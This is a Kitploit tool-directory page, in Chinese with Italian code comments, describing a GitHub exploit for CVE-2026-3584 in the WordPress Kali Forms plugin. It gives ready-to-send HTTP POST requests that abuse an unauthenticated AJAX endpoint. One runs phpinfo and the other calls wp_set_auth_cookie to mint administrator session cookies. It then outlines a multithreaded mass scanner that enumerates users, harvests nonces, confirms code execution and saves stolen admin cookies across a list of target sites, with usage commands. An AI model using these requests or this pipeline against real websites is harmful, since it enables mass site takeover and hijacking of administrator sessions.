Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-3584 — CVE-2026-3584 | Kitploit
工具/GitHubGitHub/yucaerin/cve-2026-3584
权限提升侦察漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集渗透测试Payload 开发
GitHubyucaerin/cve-2026-3584

CVE-2026-3584

CVE-2026-3584

查看仓库
3126个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-3584 – WordPress Kali Forms <= 2.4.9 - 通过 form_process 未认证远程代码执行

🔥 漏洞摘要

WordPress 插件 Kali Forms 版本 <= 2.4.9 存在一个严重的未认证远程代码执行(RCE)漏洞。该漏洞允许未认证攻击者在服务器上执行任意 PHP 代码,并通过公开暴露且无授权检查的 AJAX 端点 kaliforms_form_process 获得完全管理员权限。

该漏洞位于 form_process 函数中,该函数接受用户控制的参数(包括 thisPermalink 和 entryCounter)并执行任意 PHP 回调,导致:

  • 远程代码执行(RCE):通过 phpinfo()、system()、eval() 等
  • 权限提升:通过 wp_set_auth_cookie() 获取管理员会话

ðŸ"" 易受攻击的插件

  • 插件名称: Kali Forms – WordPress Form Builder
  • 受影响版本: <= 2.4.9
  • 漏洞类型: 未认证远程代码执行 + 权限提升
  • CVE ID: CVE-2026-3584
  • CVSS 评分: 10.0(严重)
  • 影响: 网站完全沦陷、管理员访问、持久化
  • 链接: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process

🐛 漏洞工作原理

漏洞技术分析

该漏洞出现在 Kali Forms 插件处理 AJAX 请求的 form_process 函数中。易受攻击的代码通过以下方式暴露:

// Endpoint AJAX accessibile senza autenticazione
add_action('wp_ajax_nopriv_kaliforms_form_process', array($this, 'form_process'));

漏洞利用流程:

  1. 未受保护的端点: 端点 /wp-admin/admin-ajax.php?action=kaliforms_form_process 通过 wp_ajax_nopriv_ 钩子对未认证用户可访问。

  2. 用户可控参数:

    • data[thisPermalink] - 可包含任意 PHP 函数名
    • data[entryCounter] - 可包含任意 PHP 函数名
    • data[formId] - 要处理的表单 ID
  3. 未经过滤的回调执行: 易受攻击的代码在未经验证的情况下执行 PHP 回调:

    $callback = $_POST['data']['thisPermalink'];
    call_user_func($callback);  // Nessun controllo!
    
  4. 漏洞利用链:

    Attacker → POST Request → kaliforms_form_process
         ↓
    thisPermalink=phpinfo → call_user_func('phpinfo')
         ↓
    PHP Code Execution → phpinfo() eseguito
         ↓
    entryCounter=wp_set_auth_cookie → Cookie amministratore generato
         ↓
    Full Admin Access
    

易受攻击的请求示例:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[thisPermalink]=phpinfo&
data[email][email protected]

结果: 服务器执行 phpinfo() 并返回完整的 PHP 配置信息。

用于权限提升:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[entryCounter]=wp_set_auth_cookie&
data[email][email protected]

结果: WordPress 执行 wp_set_auth_cookie(user_id),其中 user_id 通常与 formId 对应,从而生成有效的管理员会话 cookie。


🛠批量扫描器 - 工作原理

扫描器架构

mass_scanner.py 实现了一个 4 阶段自动化流水线,用于完整利用 CVE-2026-3584 漏洞:

┌─────────────────────────────────────────────────────────────────┐
│                    MASS SCANNER PIPELINE                        │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  Fase 1: Ricognizione API REST                                 │
│  ├─ Enumera utenti: /wp-json/wp/v2/users                       │
│  └─ Enumera post: /wp-json/wp/v2/posts                         │
│      → Identifica user_id e post_id per escalation             │
│                                                                 │
│  Fase 2: Scoperta Moduli                                       │
│  ├─ Crawl sito (depth=2)                                       │
│  ├─ Cerca pattern: 'KaliFormsObject', 'kaliforms'              │
│  ├─ Estrae nonce da JavaScript                                 │
│  └─ Estrae formId da HTML                                      │
│      → Trova tutti i moduli Kali Forms vulnerabili             │
│                                                                 │
│  Fase 3: Test RCE                                              │
│  ├─ Invia: data[thisPermalink]=phpinfo                         │
│  ├─ Verifica: 'PHP Version' in response                        │
│  └─ Salva: result/target_phpinfo.html                          │
│      → Conferma esecuzione codice remoto                       │
│                                                                 │
│  Fase 4: Escalation Privilegi                                  │
│  ├─ Invia: data[entryCounter]=wp_set_auth_cookie              │
│  ├─ Estrae: wordpress_logged_in + wordpress_sec cookies        │
│  ├─ Verifica: Accesso a /wp-admin/ senza redirect             │
│  └─ Salva: result_cookie/target.txt                            │
│      → Ottiene accesso amministratore completo                 │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

实现技术细节

1. 自动 URL 规范化

def normalize_url(self, target):
    # Aggiunge automaticamente http:// o https://
    # Prova prima HTTPS, poi fallback su HTTP
    # Gestisce porte personalizzate (es. :8080)

2. REST API 枚举

def enumerate_users_api(self, target):
    # GET /wp-json/wp/v2/users
    # Estrae tutti gli user_id disponibili
    # Usato per mappare formId → user_id
    
def enumerate_posts_api(self, target):
    # GET /wp-json/wp/v2/posts
    # Estrae tutti i post_id disponibili
    # Identifica sovrapposizioni user_id/post_id

3. 表单发现(智能爬取)

def discover_pages(self, target, max_depth=2):
    # Crawl ricorsivo del sito
    # Cerca pattern JavaScript: 'KaliFormsObject'
    # Filtra URL non necessari (js, css, immagini)
    # Segue solo link interni
    # Ritorna lista pagine con Kali Forms

4. 表单数据提取

def extract_form_data(self, page_url):
    # Estrae nonce da JavaScript:
    #   KaliFormsObject = { ajax_nonce: "abc123" }
    # Estrae formId da HTML:
    #   data-id="1" o [kaliform id="1"]
    # Se nonce trovato ma no formId:
    #   Brute force ID 1-10

5. RCE 测试

def test_rce(self, target, form_id, nonce):
    # POST /wp-admin/admin-ajax.php
    # Payload: data[thisPermalink]=phpinfo
    # Verifica: len(response) > 10000 e 'PHP Version' presente
    # Salva HTML completo per analisi

6. 权限提升测试

def test_privilege_escalation_fast(self, target, nonce, user_ids, post_ids):
    # Strategia intelligente:
    # 1. Cerca sovrapposizioni user_id/post_id
    # 2. Testa prima ID con alta probabilità successo
    # 3. Fallback su ID comuni: 1,2,3,4,5
    
    # Per ogni formId candidato:
    # POST data[entryCounter]=wp_set_auth_cookie
    # Estrae cookie: wordpress_logged_in + wordpress_sec
    # Verifica: GET /wp-admin/ → no redirect
    # Controlla: 'dashboard' in response

7. 多线程

# ThreadPoolExecutor per elaborazione parallela
# Thread-safe locks per scrittura risultati
# Salvataggio real-time (append mode)
# Statistiche globali con sync

8. 自动备份系统

def backup_previous_results(self):
    # Prima di ogni scan:
    # result_phpinfo.txt → result_phpinfo.txt.20260325_120000.backup
    # result/ → result.20260325_120000.backup/
    # result_cookie/ → result_cookie.20260325_120000.backup/
    # Preserva tutti i dati storici

🚀 使用批量扫描器

要求

pip3 install requests beautifulsoup4

准备目标文件

创建一个 targets.txt 文件,每行一个目标(http/https 可选):

example.com
wordpress.site
192.168.1.100
http://blog.example.org
https://secure.site.com:8080

基本执行

# Scansione con impostazioni predefinite (20 thread)
python3 mass_scanner.py targets.txt
下载工具